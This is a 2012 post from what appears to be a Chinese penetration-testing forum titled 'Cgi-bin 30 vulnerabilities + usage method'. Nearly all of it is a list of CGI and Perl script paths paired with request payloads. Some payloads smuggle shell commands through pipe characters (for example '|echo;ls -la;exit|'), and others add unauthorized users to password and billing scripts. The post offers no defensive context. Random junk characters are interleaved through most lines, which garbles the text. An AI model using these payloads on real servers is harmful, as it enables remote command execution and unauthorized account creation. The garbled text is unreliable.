中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞＋使用方法 [打印本页]

---

作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞＋使用方法
==============================
. w" K1 H" G0 }7 s8 T3 O
/smspass.pl
* n0 ]8 @& P; R4 X! {& kusername=username&password=password

% Q7 G8 ~3 u0 {8 R/index.cgi
3 R. @8 p, H9 R9 X% j, awei=ren&gen=command

7 Q5 C+ M) e) N1 C% V$ N2 j/passmaster.cgi
2 ?; t6 ^  \) AAction=Add&Username=Username&Password=Password
7 e% K  A2 E* ^' J- t) \/ P' q
' F8 F  a2 _3 _! \/accountcreate.cgi
( u. h/ O. J0 O6 ]username=username&password=password&ref1=|echo;ls|
' i* F; v1 p7 `" ~8 x, \
/form.cgi
/ n% ]2 n7 V( R- g1 p( \name=xxxx&email=email&subject=xxxx&response=|echo;ls|

3 F* F( P* [; @+ ~0 I- s4 l. i/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

( V( j# h6 C+ U# w; p  X; Z/ccbill-local.asp
% F  c0 t; u/ V: `. I" fpost_values=username:password

1 ]& _% D4 L4 e9 F0 S/count.cgi
pinfile=|echo;ls -la;exit|

; K  N) f) F! e9 _1 y: q0 B, b/recon.cgi
4 k2 q" J& y5 B% X5 L3 ?: p1 B. E/recon.cgi?search
5 a7 c" m! K% \3 lsearchoption=1&searchfor=|echo;ls -al;exit|
8 j2 |9 d* S$ Z1 \  a1 q, O* ]& l
/verotelrum.pl
! z' q, s( w% P8 H2 ]9 [: bvercode=username:password:dseegsow:add:amount<&30>
( a' Y4 b* u9 r  a( d
' k2 @8 ^) I' E+ k$ u/ B/af.cgi
7 N& N5 z; V/ X" o" ?. w6 x) V_browser_out=|echo;ls -la;exit;|
! s* v( `8 w7 d8 G% m6 C1 v
/modify.cgi
" _, R! R. h5 l3 |9 cusername=username&password=password&expire=30

4 N$ s# `2 `* z7 j/openjournal.cgi
2 i1 j2 b9 s9 p$ h* ]9 pedit=1&ct=2&go=|echo;ls -al;exit|
5 M# t, _: }: S8 r, V9 ~
/gx9passwd.cgi
; v+ P# d! |6 S2 T/ rcmd=ADD&user=username&pass=password
  L& K% k, q# X; g- y
6 k$ Y+ l: B3 }& x/probecontrol.cgi
; I( W$ T% P8 W" @- I2 A# E; o' @command=enable&username=username&password=password

/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit

6 l7 Y( V! g1 [- K/htadd.pl
+ x+ S- }$ E" k/ _' e& j  k7 @configfile=|echo; ls -alt; exit
6 _& A" H7 h- A% o  \
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
$ X* R( b# A8 t- g4 k
2 W- _5 _2 }! C7 T# P/ibill*.pl
4 o! e9 o  [6 k7 O" z# Xreqtype=add&authpwd=authpwd&username=username&password=password
2 T- X& S3 O2 ~2 r
. s( @! `$ a0 {" t5 j1 C/cpay.cgi
4 M; x" G5 I' _5 ?6 }- ?command=add_member&username=username(EMAIL)&password=password(DES)

+ M9 f! [$ U. ?% u2 @7 q, J6 f/globill_ut.cgi
2 V' C6 ?8 Y8 }/ c1 g0 hdo=add&username=username&password=password&wpassword=password

/usercontrol.cgi
9 k1 ~1 O6 a6 I+ b! O# {command=enable&username=USER&password=PASS
& S6 |5 f' S8 z: Q1 {2 H: f
7 b4 \$ B3 O2 B1 l/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

: T# P( N- g% r$ ^/addusr.pl
user=USER&pass=PASS&confirm=PASS
9 [* x6 I, y8 i8 u; h% d8 W8 e
/pincount.cgi
# I4 P* u. @" p+ n/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
# l; Z( z! P9 ]1 r* r' I0 |
4 z; F. ^$ p7 s5 x" d- J$ O+ v/accountcreate.cgi
& B& W0 V/ h; q  j- x+ S/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
/env.cgi
ADD+;echo;pwd;exit

, O; l: [. _; X3 w& _& A/count.cgi
pinfile=|echo;pwd;exit|

3 G, j& u$ T, ?. v6 U% I- M; V, J/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
2 {3 o3 y. {# ~, `! p- U
0 F0 H3 \+ V- l0 r/add.cgi
8 `7 O8 E( O! n0 }) s& h: `username=username&password=password&expire=30

==============================

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2